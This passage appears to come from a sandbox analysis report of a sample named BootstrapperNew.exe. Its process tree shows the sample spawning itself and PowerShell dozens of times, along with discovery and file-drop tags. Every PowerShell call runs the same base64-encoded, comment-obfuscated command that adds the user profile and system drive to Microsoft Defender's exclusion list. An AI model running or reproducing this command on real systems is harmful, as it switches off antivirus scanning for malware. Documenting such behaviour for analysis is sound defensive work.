        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        38⤵
        
        PID:7360
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        38⤵
        
        PID:7368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        39⤵
        
        PID:7640
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        39⤵
        
        PID:7648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        40⤵
        
        PID:7856
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        40⤵
        
        PID:7872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        41⤵
        
        PID:8164
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        41⤵
        Checks computer location settings
        
        PID:8172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        42⤵
        
        PID:7220
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        42⤵
        
        PID:7292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        43⤵
        
        PID:7204
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        43⤵
        
        PID:7244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        44⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        44⤵
        Drops file in Windows directory
        
        PID:432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        45⤵
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        45⤵
        Checks computer location settings
        
        PID:760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        46⤵
        
        PID:7908
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        46⤵
        System Location Discovery: System Language Discovery
        
        PID:6508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        47⤵
        System Location Discovery: System Language Discovery
        
        PID:7244
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        47⤵
        
        PID:6180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        48⤵
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        48⤵
        Drops file in Windows directory
        
        PID:392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        49⤵
        
        PID:7328
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        49⤵
        System Location Discovery: System Language Discovery
        
        PID:2820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        50⤵
        
        PID:7960
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        50⤵
        Checks computer location settings
        
        PID:1656
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        51⤵
        
        PID:5220
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        51⤵
        
        PID:5440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        52⤵
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        52⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:5904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        53⤵
        
        PID:224
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        54⤵
        
        PID:540
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        53⤵
        
        PID:5204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        54⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        54⤵
        
        PID:7996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        55⤵
        System Location Discovery: System Language Discovery
        
        PID:6788
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        55⤵
        
        PID:2000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        56⤵
        
        PID:5468
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        56⤵
        Drops file in Windows directory
        
        PID:7036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        57⤵
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        57⤵
        Drops file in Windows directory
        
        PID:5296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        58⤵
        
        PID:8136
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        58⤵
        
        PID:4280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        59⤵
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        59⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        60⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        60⤵
        
        PID:4796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        61⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        61⤵
        
        PID:2820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        62⤵
        
        PID:7064
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        62⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        63⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        63⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        64⤵
        
        PID:5488
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        65⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        64⤵
        
        PID:6340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        65⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        65⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        66⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        66⤵
        
        PID:6292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        67⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        67⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        68⤵
        
        PID:6912
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        68⤵
        
        PID:5244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        69⤵
        
        PID:6328
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
